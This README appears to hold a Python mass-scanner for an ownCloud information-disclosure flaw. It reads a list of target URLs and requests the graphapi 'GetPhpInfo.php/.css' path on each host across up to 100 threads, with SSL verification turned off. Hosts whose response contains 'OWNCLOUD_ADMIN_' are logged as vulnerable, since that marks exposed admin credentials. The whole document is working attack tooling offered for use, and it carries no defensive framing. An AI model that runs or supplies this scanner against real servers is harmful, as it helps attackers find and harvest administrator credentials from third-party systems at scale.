README.md
Rendering markdown...
import requests
import urllib3
from concurrent.futures import ThreadPoolExecutor
from colorama import Fore, Style
import argparse
import queue
from alive_progress import alive_bar
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def check_phpinfo(url):
try:
response = requests.get(url, verify=False) # Bypass SSL verification
if response.status_code == 200 and 'OWNCLOUD_ADMIN_' in response.text:
return True
except requests.RequestException:
pass
return False
def process_urls(url_queue, output_file, update_bar):
with open(output_file, 'a') as out:
while True:
url = url_queue.get()
if url is None:
url_queue.task_done()
break # Sentinel value to indicate completion
try:
if check_phpinfo(url):
print(Fore.GREEN + "Valid: " + url + Style.RESET_ALL)
out.write(url + '\n')
else:
print(Fore.RED + "Invalid: " + url + Style.RESET_ALL)
except Exception as e:
print(Fore.YELLOW + f"Error processing {url}: {e}" + Style.RESET_ALL)
finally:
url_queue.task_done()
update_bar() # Update the progress bar
def process_file(file_path, output_file):
urls = []
with open(file_path, 'r') as file:
for line in file:
base_url = line.strip()
# Append both URL variants for each base URL
urls.append(base_url + "/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css")
urls.append(base_url + "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css")
url_queue = queue.Queue()
num_workers = min(100, len(urls)) # Adjust based on your system's capabilities
with alive_bar(len(urls), bar='smooth', enrich_print=False) as bar:
with ThreadPoolExecutor(max_workers=num_workers) as executor:
# Start worker threads
for _ in range(num_workers):
executor.submit(process_urls, url_queue, output_file, bar)
# Read URLs and add them to the queue
for url in urls:
url_queue.put(url)
# Add sentinel values to indicate completion
for _ in range(num_workers):
url_queue.put(None)
url_queue.join() # Wait for all tasks to be completed
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Process some URLs.')
parser.add_argument('-t', '--target', required=True, help='Input file with URLs')
parser.add_argument('-o', '--output', required=True, help='Output file for valid URLs')
args = parser.parse_args()
process_file(args.target, args.output)